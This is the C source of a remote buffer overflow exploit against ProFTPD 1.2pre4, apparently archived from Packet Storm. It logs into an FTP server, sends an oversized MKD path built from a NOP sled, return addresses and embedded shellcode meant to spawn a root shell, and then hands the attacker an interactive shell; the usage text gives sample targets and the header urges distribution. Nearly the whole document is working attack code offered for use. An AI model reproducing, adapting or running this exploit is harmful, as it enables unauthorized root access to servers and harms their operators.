ProFTPD 1.2pre4 remote buffer overflow exploit. Requires a writable directory.
ddaa523bce8660f1ea7139487103115776722b6432a3e876c8f85d29b5c96cc5/*
ProFTPD 1.2pre4 Remote Buffer Overflow Xploit
by wildcoyote@coders-pt.org
Advisorie (from www.securityfocus.com):
The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable
buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c.
The vulnerability in -> 1.2pre4 <- is a mkdir overflow. The name of the created
path can not exceed 255 chars.
-> UNRELEASED! DISTRIBUTE! <- :] heh
I'm almost sure that no1 coded a exploit against this version of
ProFtpd/using the same buffer overflow.
*/
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#define DELAY 2 // wait 2 secondz before sending each command :]
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 255
#define RETURN_ADDRESS 0xbffff550
#define NOP 0x90
char shellcode[] =
"\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
"\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
"\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
"\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
"\xcd\x80\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff";
int
openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock==-1;
return sock;
}
void
sends(int sock,char *buf) {
write(sock,buf,strlen(buf));
}
void
own3dshell(int sock)
{
char buf[1024];
fd_set rset;
int i;
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
i=read(sock,buf,1024);
if (i <= 0)
{
printf("The connection was closed!\n");
printf("Exiting...\n\n");
exit(0);
}
buf[i]=0;
puts(buf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
i=read(STDIN_FILENO,buf,1024);
if (i>0)
{
buf[i]=0;
write(sock,buf,i);
}
}
}
}
void
own(char *username, char *password, char *writable_dir, char *host, int port, int offset)
{
char buf[512], *buf_ptr, *ptr;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE+100, sock, i;
printf("Trying to connect to %s [%d]...",host,port);
sock=openhost(host,port);
if (sock==-1)
{
printf("FAILED\n");
printf("Exiting...\n\n");
exit(-1);
}
printf("SUCCESSFULL\n");
printf("Sending username (%s)...",username);
snprintf(buf,sizeof(buf),"USER %s\n",username);
sends(sock,buf);
printf("DONE\n");
bzero(buf,strlen(buf));
sleep(DELAY);
printf("Sending password (");
for(i=0;i<strlen(password);i++) printf("*");
printf(")...");
snprintf(buf,sizeof(buf),"PASS %s\n",password);
sends(sock,buf);
printf("DONE\n");
bzero(buf,strlen(buf));
sleep(DELAY);
printf("CWD %s...",writable_dir);
snprintf(buf,sizeof(buf),"CWD %s\n",writable_dir);
sends(sock,buf);
printf("DONE\n");
bzero(buf,strlen(buf));
sleep(DELAY);
printf("Allocating mem for buffer overflow...\n");
if (!(buf_ptr=malloc(bsize)))
{
printf("Couldn't allocate memory!\n");
printf("Exiting...\n\n");
exit(-1);
}
printf("Preparing buffer...\n");
addr=RETURN_ADDRESS-offset;
ptr=buf_ptr;
addr_ptr=(long *) ptr;
for (i=0;i<bsize; i+=4) *(addr_ptr++)=addr;
for (i=0;i< bsize/2;i++) buf_ptr[i]=NOP;
ptr=buf_ptr+((bsize/2)-(strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buf_ptr[bsize-1]='\0';
snprintf(buf,sizeof(buf),"MKD %s\n",buf_ptr);
printf("Sending evil'code...\n");
sends(sock,buf);
sleep(DELAY);
printf("Oh k! If all went well, we should have a suid'shell wainting for uz ;)\n");
printf("Enjoy...\n");
own3dshell(sock);
}
main(int argc, char *argv[])
{
printf("\n\tProFtpd 1.2pre4 Remote Xploit by wildcoyote@coders-pt.org\n\n");
if (argc<5)
{
printf("Sintaxe: %s <username> <password> <writable dir> <host> [port] [offset]\n",argv[0]);
printf("Example:\n\n");
printf(" -> If you have a account on the box <-\n");
printf(" %s wildcoyote my_pass /tmp biatx.userfriendly\n",argv[0]);
printf(" -> Anonymous access on tha box <-\n");
printf(" %s anonymous whatever@ /incoming 192.168.0.2\n\n",argv[0]);
printf("If thiz doesn't bind tha own3d'shell, try a offset between 0-3\n");
printf("Regardz, wildcoyote@coders-pt.org\n\n");
}
else if (argc==5) own(argv[1],argv[2],argv[3],argv[4],21,DEFAULT_OFFSET);
else if (argc==6) own(argv[1],argv[2],argv[3],argv[4],atoi(argv[5]),DEFAULT_OFFSET);
else own(argv[1],argv[2],argv[3],argv[4],atoi(argv[5]),atoi(argv[6]));
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed